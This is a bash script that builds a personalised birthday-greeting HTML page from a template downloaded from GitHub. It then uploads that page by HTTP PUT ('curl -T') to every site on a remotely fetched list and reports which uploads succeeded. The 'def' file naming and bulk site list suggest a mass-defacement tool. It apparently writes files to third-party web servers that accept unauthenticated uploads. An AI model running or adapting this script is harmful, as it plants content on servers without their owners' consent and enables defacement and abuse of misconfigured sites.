#!/bin/bash

# Colors and styles
r='\e[91m'
g='\e[92m'
y='\e[93m'
b='\e[94m'
p='\e[95m'
c='\e[96m'
w='\e[97m'
n='\e[0m'

banner() {
 echo "banner 😐\n\n"
 ask
}


main() {
    pids=()
    sl=${sl:-sl.txt}
    if ! [[ -e $sl ]]; then
    printf "\n"
    echo -e "${w}[${r}!${w}]${r}!!! Site List Not Found !!!"
    echo -e "${w}[${g}+${w}]${g}Downloading Site List${n}"
    curl -s -o sl.txt https://raw.githubusercontent.com/DH-Alamin/file/main/sl.txt
    fi
    for site in $(< sl.txt); do
        if [[ ${#pids[@]} -ge 2 ]]; then
            wait -n
            pid_to_remove=$?
            for index in "${!pids[@]}"; do
                if [[ "${pids[$index]}" == "$pid_to_remove" ]]; then
                    unset 'pids[$index]'
                    break
                fi
            done
        fi
        scan "${site}" "${name}" &
        pids+=($!)
    done

    wait
}



scan() {
    site=${1}
    name="${2}"
    upload=$( curl -s -T ${name} ${site} )
    cd=$( curl -s -o /dev/null ${site}/${name} -w %{http_code} )
    if [[ $cd == 200 ]] || [[ $cd == 201 ]]; then
        printf "\n"
        echo -e "${w}[${g}+${w}] ${w}Link: ${g}${site}/${name} >${cd}<${n}"
    else
        echo -e "${w}[${r}-${w}] ${w}Link: ${r}${site}/${name} >${cd}<${n}"
    fi
}


ask() {

echo -ne "${w}>>> ${g}Enter Name ${w}:${g} "
read nam
echo -ne "${w}>>> ${g}Enter Chatbox Text ${w}:${g} "
read chatbox
echo -ne "${w}>>> ${g}Enter wishtext ${w}:${g} "
read wishtext
echo -ne "${w}>>> ${g}Enter IMG Link ${w}:${g} "
read img
echo -ne "${n}"
dmake
}



dmake() {
rm -rf def.html

curl -s -o def.html https://raw.githubusercontent.com/DH-Alamin/file/main/Def.html

cat >> def.html <<-EOF
<h1 class="one">
                Hi
                <span id="name">${nam}</span>
            </h1>
            <p class="two" id="greetingText">তোমাকে একটা কথা বলতে চাই!!!</p>
        </div>

        <div class="three">
            <p>আজকে তোমার জন্মদিন</p>
        </div>

        <div class="four">
            <div class="text-box">
                <p class="hbd-chatbox">
                ${chatbox}
                </p>
                <p class="fake-btn">okay...</p>
            </div>
        </div>

        <div class="five">
            <p class="idea-1">Thats what I was going to do.</p>
            <p class="idea-2">But then I stopped.</p>
            <p class="idea-3">
                I realised, I wanted to do something<br>
                <strong>special</strong>
            </p>
            <p class="idea-4">Because,</p>
            <p class="idea-5">
                You are Special For Me
                <span>:)</span>
            </p>
            <p class="idea-6">
                <span>S</span>
                <span>O</span>
            </p>
        </div>

        <div class="six">
            <img src="https://raw.githubusercontent.com/DH-Alamin/file/main/img/FB_IMG_1699603953743.jpg" alt="profile" class="profile-picture" id="imagePath"/>
            <img src="https://raw.githubusercontent.com/DH-Alamin/file/main/img/hat.svg" alt="hat" class="hat" />
            <div class="wish">
                <h3 class="wish-hbd">Happy Birthday!!! ${nam}</h3>
                <h5 id="wishText">${wishtext}</h5>
            </div>
        </div>

        <div class="seven">
            <div class="baloons">
                <img src="https://raw.githubusercontent.com/DH-Alamin/file/main/img/ballon2.svg" alt="" />
                <img src="https://raw.githubusercontent.com/DH-Alamin/file/main/img/ballon1.svg" alt="" />
                <img src="https://raw.githubusercontent.com/DH-Alamin/file/main/img/ballon3.svg" alt="" />
                <img src="https://raw.githubusercontent.com/DH-Alamin/file/main/img/ballon1.svg" alt="" />
                <img src="https://raw.githubusercontent.com/DH-Alamin/file/main/img/ballon2.svg" alt="" />
                <img src="https://raw.githubusercontent.com/DH-Alamin/file/main/img/ballon3.svg" alt="" />
                <img src="https://raw.githubusercontent.com/DH-Alamin/file/main/img/ballon2.svg" alt="" />
                <img src="https://raw.githubusercontent.com/DH-Alamin/file/main/img/ballon3.svg" alt="" />
                <img src="https://raw.githubusercontent.com/DH-Alamin/file/main/img/ballon1.svg" alt="" />
                <img src="https://raw.githubusercontent.com/DH-Alamin/file/main/img/ballon2.svg" alt="" />
                <img src="https://raw.githubusercontent.com/DH-Alamin/file/main/img/ballon3.svg" alt="" />
                <img src="https://raw.githubusercontent.com/DH-Alamin/file/main/img/ballon2.svg" alt="" />
                <img src="https://raw.githubusercontent.com/DH-Alamin/file/main/img/ballon1.svg" alt="" />
                <img src="https://raw.githubusercontent.com/DH-Alamin/file/main/img/ballon3.svg" alt="" />
                <img src="https://raw.githubusercontent.com/DH-Alamin/file/main/img/ballon2.svg" alt="" />
                <img src="https://raw.githubusercontent.com/DH-Alamin/file/main/img/ballon3.svg" alt="" />
                <img src="https://raw.githubusercontent.com/DH-Alamin/file/main/img/ballon1.svg" alt="" />
                <img src="https://raw.githubusercontent.com/DH-Alamin/file/main/img/ballon2.svg" alt="" />
                <img src="https://raw.githubusercontent.com/DH-Alamin/file/main/img/ballon1.svg" alt="" />
                <img src="https://raw.githubusercontent.com/DH-Alamin/file/main/img/ballon3.svg" alt="" />
                <img src="https://raw.githubusercontent.com/DH-Alamin/file/main/img/ballon3.svg" alt="" />
                <img src="https://raw.githubusercontent.com/DH-Alamin/file/main/img/ballon1.svg" alt="" />
                <img src="https://raw.githubusercontent.com/DH-Alamin/file/main/img/ballon2.svg" alt="" />
                <img src="https://raw.githubusercontent.com/DH-Alamin/file/main/img/ballon3.svg" alt="" />
                <img src="https://raw.githubusercontent.com/DH-Alamin/file/main/img/ballon2.svg" alt="" />
                <img src="https://raw.githubusercontent.com/DH-Alamin/file/main/img/ballon1.svg" alt="" />
                <img src="https://raw.githubusercontent.com/DH-Alamin/file/main/img/ballon3.svg" alt="" />
                <img src="https://raw.githubusercontent.com/DH-Alamin/file/main/img/ballon2.svg" alt="" />
                <img src="https://raw.githubusercontent.com/DH-Alamin/file/main/img/ballon3.svg" alt="" />
                <img src="https://raw.githubusercontent.com/DH-Alamin/file/main/img/ballon1.svg" alt="" />
                <img src="https://raw.githubusercontent.com/DH-Alamin/file/main/img/ballon2.svg" alt="" />
                <img src="https://raw.githubusercontent.com/DH-Alamin/file/main/img/ballon1.svg" alt="" />
                <img src="https://raw.githubusercontent.com/DH-Alamin/file/main/img/ballon3.svg" alt="" />
            </div>
        </div>

        <div class="eight">
            <svg viewBox="0 0 40 40" xmlns="http://www.w3.org/2000/svg">
                <circle cx="20" cy="20" r="20" />
            </svg>
            <svg viewBox="0 0 40 40" xmlns="http://www.w3.org/2000/svg">
                <circle cx="20" cy="20" r="20" />
            </svg>
            <svg viewBox="0 0 40 40" xmlns="http://www.w3.org/2000/svg">
                <circle cx="20" cy="20" r="20" />
            </svg>
            <svg viewBox="0 0 40 40" xmlns="http://www.w3.org/2000/svg">
                <circle cx="20" cy="20" r="20" />
            </svg>
            <svg viewBox="0 0 40 40" xmlns="http://www.w3.org/2000/svg">
                <circle cx="20" cy="20" r="20" />
            </svg>
            <svg viewBox="0 0 40 40" xmlns="http://www.w3.org/2000/svg">
                <circle cx="20" cy="20" r="20" />
            </svg>
            <svg viewBox="0 0 40 40" xmlns="http://www.w3.org/2000/svg">
                <circle cx="20" cy="20" r="20" />
            </svg>
            <svg viewBox="0 0 40 40" xmlns="http://www.w3.org/2000/svg">
                <circle cx="20" cy="20" r="20" />
            </svg>
            <svg viewBox="0 0 40 40" xmlns="http://www.w3.org/2000/svg">
                <circle cx="20" cy="20" r="20" />
            </svg>
        </div>

        <div class="nine">
            <p>Okay, now come back and tell me if you liked it.</p>
            <p>Or click reply, if you want to watch it again.</p>
            <p id="replay">REPLY</p>
            <p class="last-smile">:)</p>
            <br><br><br><a>github.com/DH-Alamin</a>
        </div>
    </div>

</body>
    <!-- Greensock -->
    <script src="https://cdnjs.cloudflare.com/ajax/libs/gsap/3.11.5/gsap.min.js"></script>
    <!-- Sweetalert -->
    <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11"></script>    
</html>
EOF
mv def.html ${nam}.html
name="${nam}.html"
}


banner
main
